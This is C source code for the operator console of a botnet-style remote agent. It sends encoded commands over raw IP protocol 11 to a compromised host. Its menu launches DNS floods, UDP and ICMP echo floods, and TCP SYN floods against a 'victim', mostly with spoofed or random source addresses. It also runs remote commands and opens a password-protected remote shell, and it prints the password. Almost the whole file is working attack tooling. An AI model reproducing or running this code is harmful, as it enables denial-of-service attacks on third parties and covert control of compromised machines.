#include #include #include #include #include #include #include #include #include #define SHELL_PORT 23281 void command0(void); void command1(void); void command2(void); void command3(void); void command4(void); void command5(void); void command6(void); void command7(void); void command8(void); void command9(void); void command10(void); void command11(void); void command12(void); void pdie(const char *); void encode(unsigned, char *, unsigned char *); void decode(unsigned, const unsigned char *, char *); int send_msg(struct in_addr dest, char *data, int len); struct command { char *cmd_descr; void (*cmd)(void); } commands[] = { {"Enter agent IP address", &command0}, {"Request status from agent", &command1}, {"Initialize agent", &command2}, {"Execute remote command, send back results", &command3}, {"DNS flood", &command4}, {"UDP or ICMP echo flood", &command5}, {"Remote shell", &command6}, {"Execute remote command, don't send back results", &command7}, {"Kill current task", &command8}, {"DNS flood with delay", &command9}, {"TCP SYN flood", &command10}, {"TCP SYN flood with delay", &command11}, {"DNS flood with server", &command12} }; #define LAST_COMMAND (sizeof(commands)/sizeof(struct command)) struct in_addr agent_ip; int main(int argc, char **argv) { int option; int i; if (geteuid() != 0) { printf("Need to run as root\n"); exit(1); } for (;;) { if (agent_ip.s_addr == 0) printf("\nAgent address is not set.\n\n"); else printf("\nAgent address is %d.%d.%d.%d\n\n", ( (u_char *) &agent_ip.s_addr)[0], ( (u_char *) &agent_ip.s_addr)[1], ( (u_char *) &agent_ip.s_addr)[2], ( (u_char *) &agent_ip.s_addr)[3]); for (i = 0; i < LAST_COMMAND; i++) printf("[%d] %s\n", i, commands[i].cmd_descr); printf("[%d] Exit\n", i); do { printf("\nEnter option: "); scanf("%d", &option); } while (option > LAST_COMMAND); if (option == LAST_COMMAND) break; else if (option >=1 && option <= LAST_COMMAND - 1 && agent_ip.s_addr == 0) fprintf(stderr, "\nYou haven't set the agent's IP address!\n"); else commands[option].cmd(); } return 0; } void command0(void) { struct hostent *agent; char buffer[100]; printf("\nEnter agent IP address or host name: "); scanf("%s", buffer); if ( (agent = gethostbyname(buffer)) == NULL) { fprintf(stderr, "Error resolving host name\n"); return; } agent_ip.s_addr = *(unsigned *) agent->h_addr_list[0]; } void command1(void) { unsigned char payload[400], decoded[sizeof(payload) - 2]; payload[0] = 2; /* To agent */ decoded[1] = 1; /* Command is request status */ /* Careful! Pass the right size or you'll overwrite something! */ encode(sizeof(decoded), decoded, payload + 2); send_msg(agent_ip, payload, sizeof(payload) ); } void command2(void) { int response_type, number_of_ips; struct in_addr ips[10]; int i; struct hostent *host; char buffer[100]; unsigned char payload[400], decoded[400]; printf("\nType of desired response:\n\n" "[0] To 1 specific IP address\n" "[1] To 1 specific IP address and 9 random IP addresses\n" "[2] To 10 specific IP addresses\n" "[3] Abort\n"); do { printf("\nEnter option: "); scanf("%d", &response_type); } while (response_type > 3); if (response_type == 3) return; number_of_ips = (response_type == 0 || response_type == 1) ? 1 : 10; printf("\nNeed to enter %d IP addresses or host names\n", number_of_ips); for (i = 0; i < number_of_ips; i++) { printf("\nEnter agent IP address or host name #%d: ", i + 1); scanf("%s", buffer); if ( (host = gethostbyname(buffer)) == NULL) { fprintf(stderr, "Error resolving host name\n"); return; } ips[i].s_addr = *(unsigned *) host->h_addr_list[0]; } payload[0] = 2; /* To agent */ decoded[1] = 2; /* Command is initialize */ decoded[2] = response_type; if (response_type == 0 || response_type == 1) { decoded[3] = ((char *) &ips)[0]; decoded[4] = ((char *) &ips)[1]; decoded[5] = ((char *) &ips)[2]; decoded[6] = ((char *) &ips)[3]; } else for (i = 0; i < 10; i++) { decoded[3 + i*4] = ((char *) &ips)[i*4 + 0]; decoded[4 + i*4] = ((char *) &ips)[i*4 + 1]; decoded[5 + i*4] = ((char *) &ips)[i*4 + 2]; decoded[6 + i*4] = ((char *) &ips)[i*4 + 3]; } encode(sizeof(decoded) - 2, decoded, payload + 2); send_msg(agent_ip, payload, sizeof(payload) ); } void command3(void) { char buffer[100]; unsigned char payload[400], decoded[400]; int ch, len; printf("\nEnter command to execute at agent: "); for (ch = 'x'; ch != '\n' && ch != EOF;) ch = getchar(); fgets(buffer, sizeof(buffer), stdin); len = strlen(buffer); if (len > 0 && buffer[len - 1] == '\n') buffer[len - 1] = '\0'; payload[0] = 2; /* To agent */ decoded[1] = 3; /* Command is execute command */ strcpy(decoded + 2, buffer); encode(sizeof(decoded) - 2, decoded, payload + 2); send_msg(agent_ip, payload, sizeof(payload) ); } void command4(void) { int option; int a, b, c, d; char hostname[100]; int src_port; int len, ch; unsigned char payload[400], decoded[sizeof(payload) - 2]; printf("\nHow do you wish to specify the victim's IP address:\n\n" "[0] Enter IP address\n" "[1] Enter host name\n"); do { printf("\nEnter option: "); scanf("%d", &option); } while (option > 2); if (option == 2) return; if (option == 0) { printf("\nEnter victim IP address: "); scanf("%d.%d.%d.%d", &a, &b, &c, &d); } else { printf("\nEnter victim host name: "); for (ch = 'x'; ch != '\n' && ch != EOF;) ch = getchar(); fgets(hostname, sizeof(hostname), stdin); len = strlen(hostname); if (len > 0 && hostname[len - 1] == '\n') hostname[len - 1] = '\0'; } printf("UDP source port to use (enter 0 to use random port): "); scanf("%d", &src_port); payload[0] = 2; /* To agent */ decoded[1] = 4; /* Command is DNS flood */ decoded[2] = a; decoded[3] = b; decoded[4] = c; decoded[5] = d; decoded[6] = src_port >> 8; decoded[7] = src_port & 0xff; decoded[8] = option; if (option == 1) strcpy(&decoded[9], hostname); /* Careful! Pass the right size or you'll overwrite something! */ encode(sizeof(decoded), decoded, payload + 2); send_msg(agent_ip, payload, sizeof(payload) ); } void command5(void) { int dos_type; int use_hostname; int len, ch; int dst1, dst2, dst3, dst4; int src1, src2, src3, src4; unsigned char payload[400], decoded[400]; char hostname[100]; int dst_port; printf("\nDoS type:\n\n" "[0] UDP flood\n" "[1] ICMP echo flood\n" "[2] Abort\n"); do { printf("\nEnter option: "); scanf("%d", &dos_type); } while (dos_type > 2); if (dos_type == 2) return; printf("\nHow do you wish to specify the victim's IP address:\n\n" "[0] Enter IP address\n" "[1] Enter host name\n" "[2] Abort\n"); do { printf("\nEnter option: "); scanf("%d", &use_hostname); } while (use_hostname > 2); if (use_hostname == 2) return; if (use_hostname == 0) { printf("\nEnter victim IP address: "); scanf("%d.%d.%d.%d", &dst1, &dst2, &dst3, &dst4); } else { printf("\nEnter victim host name: "); for (ch = 'x'; ch != '\n' && ch != EOF;) ch = getchar(); fgets(hostname, sizeof(hostname), stdin); len = strlen(hostname); if (len > 0 && hostname[len - 1] == '\n') hostname[len - 1] = '\0'; } printf("\nSpoofed source address to use: "); scanf("%d.%d.%d.%d", &src1, &src2, &src3, &src4); if (dos_type == 0) { printf("Dest. UDP port to use in flood: "); scanf("%d", &dst_port); } payload[0] = 2; /* To agent */ decoded[1] = 5; /* Command is DNS flood */ decoded[2] = dos_type; decoded[3] = dst_port; decoded[4] = dst1; decoded[5] = dst2; decoded[6] = dst3; decoded[7] = dst4; decoded[8] = src1; decoded[9] = src2; decoded[10] = src3; decoded[11] = src4; decoded[12] = use_hostname; if (use_hostname == 1) strcpy(&decoded[13], hostname); /* Careful! Pass the right size or you'll overwrite something! */ encode(sizeof(decoded), decoded, payload + 2); send_msg(agent_ip, payload, sizeof(payload) ); } void command6(void) { unsigned char payload[400], decoded[400]; payload[0] = 2; /* To agent */ decoded[1] = 6; /* Command is execute a shell */ encode(sizeof(decoded) - 2, decoded, payload + 2); send_msg(agent_ip, payload, sizeof(payload) ); printf("\nRemote shell available at %d.%d.%d.%d port %d.\n" "Use netcat to connect. Password is \"SeNiF\"\n", ( (char *) &agent_ip.s_addr)[0], ( (char *) &agent_ip.s_addr)[1], ( (char *) &agent_ip.s_addr)[2], ( (char *) &agent_ip.s_addr)[3], SHELL_PORT); } void command7(void) { char buffer[100]; unsigned char payload[400], decoded[400]; int c, len; printf("\nEnter command to execute at agent: "); for (c = 'x'; c != '\n' && c != EOF;) c = getchar(); fgets(buffer, sizeof(buffer), stdin); len = strlen(buffer); if (len > 0 && buffer[len - 1] == '\n') buffer[len - 1] = '\0'; payload[0] = 2; /* To agent */ decoded[1] = 7; /* Command is execute command, don't return output */ strcpy(decoded + 2, buffer); encode(sizeof(decoded) - 2, decoded, payload + 2); send_msg(agent_ip, payload, sizeof(payload) ); } void command8(void) { unsigned char payload[400], decoded[400]; payload[0] = 2; /* To agent */ decoded[1] = 8; /* Command is kill task */ encode(sizeof(decoded) - 2, decoded, payload + 2); send_msg(agent_ip, payload, sizeof(payload) ); printf("\nCommand to kill remote task has been sent.\n"); } void command9(void) { int option; int a, b, c, d; char hostname[100]; int src_port; int num_of_times; int len, ch; unsigned char payload[400], decoded[sizeof(payload) - 2]; printf("\nHow do you wish to specify the victim's IP address:\n\n" "[0] Enter IP address\n" "[1] Enter host name\n"); do { printf("\nEnter option: "); scanf("%d", &option); } while (option > 2); if (option == 2) return; if (option == 0) { printf("\nEnter victim IP address: "); scanf("%d.%d.%d.%d", &a, &b, &c, &d); } else { printf("\nEnter victim host name: "); for (ch = 'x'; ch != '\n' && ch != EOF;) ch = getchar(); fgets(hostname, sizeof(hostname), stdin); len = strlen(hostname); if (len > 0 && hostname[len - 1] == '\n') hostname[len - 1] = '\0'; } printf("UDP source port to use (enter 0 to use random port): "); scanf("%d", &src_port); printf("Number of times to send DNS flood: "); scanf("%d", &num_of_times); payload[0] = 2; /* To agent */ decoded[1] = 9; /* Command is DNS flood */ decoded[2] = a; decoded[3] = b; decoded[4] = c; decoded[5] = d; decoded[6] = src_port >> 8; decoded[7] = src_port & 0xff; decoded[8] = num_of_times; decoded[9] = option; if (option == 1) strcpy(&decoded[10], hostname); /* Careful! Pass the right size or you'll overwrite something! */ encode(sizeof(decoded), decoded, payload + 2); send_msg(agent_ip, payload, sizeof(payload) ); } void command10(void) { int use_hostname; int use_real_ip; int dst1, dst2, dst3, dst4; int src1, src2, src3, src4; char hostname[100]; int dst_port; int len, ch; unsigned char payload[400], decoded[sizeof(payload) - 2]; printf("\nHow do you wish to specify the victim's IP address:\n\n" "[0] Enter IP address\n" "[1] Enter host name\n"); do { printf("\nEnter use_hostname: "); scanf("%d", &use_hostname); } while (use_hostname > 2); if (use_hostname == 2) return; if (use_hostname == 0) { printf("\nEnter victim IP address: "); scanf("%d.%d.%d.%d", &dst1, &dst2, &dst3, &dst4); } else { printf("\nEnter victim host name: "); for (ch = 'x'; ch != '\n' && ch != EOF;) ch = getchar(); fgets(hostname, sizeof(hostname), stdin); len = strlen(hostname); if (len > 0 && hostname[len - 1] == '\n') hostname[len - 1] = '\0'; } printf("Destination TCP port: "); scanf("%d", &dst_port); printf("\nSource IP address to use in attack:\n\n" "[0] Use random IP\n" "[1] Enter IP address\n"); do { printf("\nEnter option: "); scanf("%d", &use_real_ip); } while (use_real_ip > 2); if (use_real_ip == 2) return; if (use_real_ip == 1) { printf("\nEnter source IP address: "); scanf("%d.%d.%d.%d", &src1, &src2, &src3, &src4); } payload[0] = 2; /* To agent */ decoded[1] = 10; /* Command is TCP SYM flood with no delay */ decoded[2] = dst1; decoded[3] = dst2; decoded[4] = dst3; decoded[5] = dst4; decoded[6] = dst_port >> 8; decoded[7] = dst_port & 0xff; decoded[8] = use_real_ip; decoded[9] = src1; decoded[10] = src2; decoded[11] = src3; decoded[12] = src4; decoded[13] = use_hostname; if (use_hostname == 1) strcpy(&decoded[14], hostname); /* Careful! Pass the right size or you'll overwrite something! */ encode(sizeof(decoded), decoded, payload + 2); send_msg(agent_ip, payload, sizeof(payload) ); } void command11(void) { int use_hostname; int use_real_ip; int dst1, dst2, dst3, dst4; int src1, src2, src3, src4; char hostname[100]; int dst_port; int delay; int len, ch; unsigned char payload[400], decoded[sizeof(payload) - 2]; printf("\nHow do you wish to specify the victim's IP address:\n\n" "[0] Enter IP address\n" "[1] Enter host name\n"); do { printf("\nEnter use_hostname: "); scanf("%d", &use_hostname); } while (use_hostname > 2); if (use_hostname == 2) return; if (use_hostname == 0) { printf("\nEnter victim IP address: "); scanf("%d.%d.%d.%d", &dst1, &dst2, &dst3, &dst4); } else { printf("\nEnter victim host name: "); for (ch = 'x'; ch != '\n' && ch != EOF;) ch = getchar(); fgets(hostname, sizeof(hostname), stdin); len = strlen(hostname); if (len > 0 && hostname[len - 1] == '\n') hostname[len - 1] = '\0'; } printf("Destination TCP port: "); scanf("%d", &dst_port); printf("Delay: "); scanf("%d", &delay); printf("\nSource IP address to use in attack:\n\n" "[0] Use random IP\n" "[1] Enter IP address\n"); do { printf("\nEnter option: "); scanf("%d", &use_real_ip); } while (use_real_ip > 2); if (use_real_ip == 2) return; if (use_real_ip == 1) { printf("\nEnter source IP address: "); scanf("%d.%d.%d.%d", &src1, &src2, &src3, &src4); } payload[0] = 2; /* To agent */ decoded[1] = 11; /* Command is TCP SYM flood with delay */ decoded[2] = dst1; decoded[3] = dst2; decoded[4] = dst3; decoded[5] = dst4; decoded[6] = dst_port >> 8; decoded[7] = dst_port & 0xff; decoded[8] = use_real_ip; decoded[9] = src1; decoded[10] = src2; decoded[11] = src3; decoded[12] = src4; decoded[13] = delay; decoded[14] = use_hostname; if (use_hostname == 1) strcpy(&decoded[15], hostname); /* Careful! Pass the right size or you'll overwrite something! */ encode(sizeof(decoded), decoded, payload + 2); send_msg(agent_ip, payload, sizeof(payload) ); } void command12(void) { } void encode(unsigned int len, char *recvbuff, unsigned char *decoded) { int i; decoded[0] = '\0'; sprintf(decoded, "%c", recvbuff[0] + 23); for (i = 1; i != len; i++) decoded[i] = recvbuff[i] + 23 + decoded[i - 1]; } void decode(unsigned len, const unsigned char *encoded, char *decoded) { unsigned char *buffer; // word-aligned array of (len + 3) elements int eax, ebx, ecx, edx; buffer = (unsigned char *) malloc( (len + 3) & 0xfffffffc); decoded[0] = 0; for (ebx = len - 1; ebx >= 0; ebx--) { eax = ebx ? encoded[ebx] - encoded[ebx - 1] : encoded[0]; ecx = eax - 23; while (ecx < 0) ecx += 256; for (edx = 0; edx < len; edx++) buffer[edx] = decoded[edx]; decoded[0] = (unsigned char) ecx; for (edx = 1; edx < len; edx++) decoded[edx] = buffer[edx - 1]; sprintf(decoded, "%c%s", (unsigned char) ecx, buffer); } free(buffer); } int send_msg(struct in_addr dest, char *data, int len) { int sockfd, sentbytes; struct sockaddr_in sockaddr; if ( (sockfd = socket(PF_INET, SOCK_RAW, 11)) == -1) pdie("Error opening raw socket"); /* Prepare sockaddr_in */ sockaddr.sin_family = AF_INET; sockaddr.sin_port = 0; sockaddr.sin_addr.s_addr = dest.s_addr; sentbytes = sendto(sockfd, data, len, 0, (struct sockaddr *) &sockaddr, sizeof(sockaddr) ); if (sentbytes == -1) pdie("Could not send data"); close(sockfd); return 0; } /********************************************************************** * pdie --- Call perror() to figure out what's going on and die. **********************************************************************/ void pdie(const char *mesg) { perror(mesg); exit(1); }